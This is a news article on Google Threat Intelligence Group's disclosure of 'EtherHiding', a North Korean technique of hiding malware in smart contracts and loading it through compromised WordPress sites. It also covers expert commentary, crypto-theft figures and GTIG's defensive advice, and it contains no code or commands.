A novel cyber threat is emerging from North Korea as its state-sponsored hackers explore embedding harmful code directly into blockchain networks.
On October 17, Google’s Threat Intelligence Group (GTIG) announced that this method, termed EtherHiding, signifies a new phase in how hackers conceal, distribute, and manage malware across decentralized systems.
Sponsored
Sponsored
What is EtherHiding?
GTIG clarified that EtherHiding enables attackers to weaponize smart contracts and public blockchains like Ethereum and BNB Smart Chain by utilizing them to store malicious payloads.
Once a piece of code is uploaded to these decentralized ledgers, it becomes nearly impossible to remove or block due to their immutable nature.
“While smart contracts offer innovative methods for building decentralized applications, their unchangeable nature is exploited in EtherHiding to host and deliver malicious code in a manner that cannot easily be blocked,” GTIG noted.
In practice, hackers compromise legitimate WordPress sites, often by taking advantage of unpatched vulnerabilities or stolen credentials.
After gaining access, they insert a few lines of JavaScript—referred to as a “loader”—into the website’s code. When a visitor opens the infected page, the loader seamlessly connects to the blockchain to retrieve malware from a remote server.
GTIG emphasized that this attack usually leaves no visible transaction trail and incurs minimal to no fees since it occurs off-chain. This effectively enables attackers to remain undetected.
Sponsored
Sponsored
Notably, GTIG traced the initial instance of EtherHiding to September 2023, during a campaign known as CLEARFAKE, which deceived users with fake browser update prompts.
How to Prevent the Attack
Cybersecurity experts indicate that this tactic indicates a transformation in North Korea’s digital strategy, shifting from merely stealing cryptocurrency to utilizing blockchain itself as a stealth weapon.
“EtherHiding signifies a transition towards next-generation bulletproof hosting, where the inherent characteristics of blockchain technology are repurposed for malicious purposes. This technique highlights the ongoing evolution of cyber threats as attackers adapt and exploit new technologies to their benefit,” GTIG stated.
John Scott-Railton, a senior researcher at Citizen Lab, labeled EtherHiding as an “early-stage trial.” He cautioned that combining it with AI-driven automation could render future attacks significantly more challenging to detect.
“I anticipate that attackers will also explore directly loading zero-click exploits onto blockchains aimed at systems & apps managing blockchains… especially if they are sometimes hosted on the same systems & networks that handle transactions / have wallets,” he added.
This new attack vector could have serious repercussions for the crypto industry, considering the prolific nature of North Korean attackers.
Data from TRM Labs indicates that North Korean-associated groups have already pilfered over $1.5 billion in crypto assets this year alone. Investigators believe these funds are used to finance Pyongyang’s military initiatives and evade international sanctions.
In light of this, GTIG advised crypto users to mitigate their risk by blocking questionable downloads and restricting unauthorized web scripts. The group also urged security researchers to identify and label harmful code embedded within blockchain networks.
